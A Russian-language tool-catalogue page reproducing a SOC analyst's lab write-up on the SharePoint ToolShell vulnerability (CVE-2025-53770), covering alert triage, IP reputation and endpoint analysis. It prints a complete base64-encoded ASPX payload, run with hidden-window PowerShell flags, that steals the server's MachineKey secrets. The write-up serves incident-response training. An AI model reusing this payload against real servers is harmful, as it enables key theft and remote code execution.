Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — Подробный разбор эксплуатации уязвимости нулевого дня CVE-2025-53770 (ToolShell) в SharePoint, включая анализ RCE, эксфильтрацию MachineKey, компиляцию полезной нагрузки, развертывание веб-шелла и шаги по сдерживанию инцидента при реагировании на него. | Kitploit
Инструменты/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Управление индикаторами компрометации (IOC)Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программЦифровая криминалистикаТестирование на ПроникновениеРазведка угроз

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Обучение и Образование
Реагирование на Инциденты
Лаборатории и Практика
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Подробный разбор эксплуатации уязвимости нулевого дня CVE-2025-53770 (ToolShell) в SharePoint, включая анализ RCE, эксфильтрацию MachineKey, компиляцию полезной нагрузки, развертывание веб-шелла и шаги по сдерживанию инцидента при реагировании на него.

Репозиторий
141 год назадЕщё не проверено
Поделиться

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Введение

Я изучил zero-day уязвимость SharePoint под названием ToolShell (CVE-2025-53770) в лаборатории LetsDefend. Я воспроизвёл реальную zero-day атаку, в ходе которой вредоносный POST-запрос обошёл аутентификацию, запустил PowerShell для кражи ключей MachineKeySection, скомпилировал payload.exe и разместил веб-шелл (spinstall0.aspx). Я зафиксировал все действия, проанализировал поведение и изолировал хост. Этот README описывает процессы атаки, шаги по её нейтрализации и извлечённые уроки.

Обзор лаборатории

  • Платформа: LetsDefend Cyber Range
  • Цель: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Задача: проанализировать RCE, отработать обнаружение и сдерживание

Используемые инструменты:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Декодер Base64
  • LetsDefend Threat Intel

Оповещение

image

Это критическое оповещение и подозрительная активность, нацеленная на ToolPane.aspx в MS SharePoint: большая полезная нагрузка и подделанный Referer. Контекст CVE связан с CVE-2025-53770. Это критическая уязвимость SharePoint, эксплуатируемая через специально сформированный POST-запрос, который позволял атакующим без аутентификации. Успешная эксплуатация привела к удалённому выполнению кода (RCE) на сервере. Я рассматривал это как активную угрозу высокой срочности и исходил из возможной успешной компрометации, пока не доказано обратное.

Что такое SharePoint

Microsoft SharePoint — это платформа для корпоративной совместной работы и управления документами: по сути, защищённый и организованный центр для файлов, рабочих процессов и внутренних веб-приложений.

Основное применение

  • Управление документами: контроль версий, журналы аудита и разрешения на файлы
  • Совместная работа: несколько пользователей могут совместно редактировать документы и обмениваться ими
  • Интранет / порталы: внутренние новости, кадровые политики, информационные панели
  • Рабочие процессы и автоматизация: формы, согласования и уведомления
  • Интеграция: подключается к Teams, Outlook, приложениям Office и Power BI

Вопросы безопасности SharePoint

  • Использует Active Directory или SSO для аутентификации
  • Данные шифруются в состоянии покоя и при передаче
  • Веб-части и макеты могут быть использованы во вред при неправильной настройке
  • Регулярная установка исправлений критически важна для защиты от zero-day эксплойтов

Что такое CVE-2025-53770 (ToolShell)

Критическая zero-day уязвимость в Microsoft SharePoint Server, позволяющая атакующим удалённо выполнять код без аутентификации. Она использует небезопасную десериализацию и часто комбинируется с другими уязвимостями SharePoint (CVE-2025-49704, CVE-2025-49706) для полного захвата системы. Оценена в 9.8 по CVSS (Critical) и активно эксплуатируется в дикой природе.

Анализ атаки с помощью VirusTotal

Я проанализировал IP-адрес отправителя (исходный IP-адрес) с помощью VirusTotal. Исходный IP-адрес: 107.191.58.76 image

Из этого видно, что 15/95 поставщиков безопасности пометили этот IP-адрес как вредоносный, что уже многое говорит об этом IP.

Геолокация IP

Теперь мне нужно определить местоположение IP. Это было сделано с помощью AbuseIPDB, и, как показано ниже, IP известен взломами, брутфорсом, атаками на веб-приложения, сканированием портов и отравлением DNS.

image

Анализ конечной точки

Как SOC-аналитик, решающий эту задачу, я понимал, что одним из важных шагов является анализ конечной точки. Я выполнил поиск хоста в Endpoint Security по имени «SharePoint01» и, поскольку этот IP известен взломами, продолжил дальнейший анализ.

image

После обнаружения хоста я открыл историю терминала, чтобы проверить командную строку.

image

| Командная строка из истории терминала

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

Флаги PowerShell: -nop -w hidden -e

  • -nop = No profile (без профиля — позволяет избежать выполнения скриптов профиля).
  • -w hidden = запуск окна скрытым (stealth).
  • -e = закодированная команда

Результаты анализа командной строки с помощью декодера Base64:

Учитывая наличие полезной нагрузки, я обратился к декодеру Base64, чтобы декодировать команду, как показано ниже.

image

Пользователь запустил powershell из системного каталога "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" и с помощью закодированных команд — серверный C#-скрипт ASP.NET.

  • Использует рефлексию для загрузки сборки System.Web,
  • Обращается к непубличному MachineKeySection и вызывает непубличный метод (GetApplicationConfig),
  • Считывает значения MachineKey веб-приложения (ValidationKey, DecryptionKey и т. д.),
  • Записывает эти ключи в HTTP-ответ (т. е. эксфильтрирует их).

Перехват полезных нагрузок и пост-эксплуатационные действия: / _layouts/15/ToolPane.aspx?...

Полезная нагрузка пытается прочитать и раскрыть ASP.NET MachineKey хоста — секрет, который можно использовать для подделки токенов ViewState/десериализации и обеспечения обхода аутентификации и удалённого выполнения кода. Это соответствует паттерну эксплуатации ToolShell (злоупотребление MachineKey).

Ключевые индикаторы компрометации (IoC) в команде, выявленные с помощью декодирования и кодирования Base64.

Скачать инструмент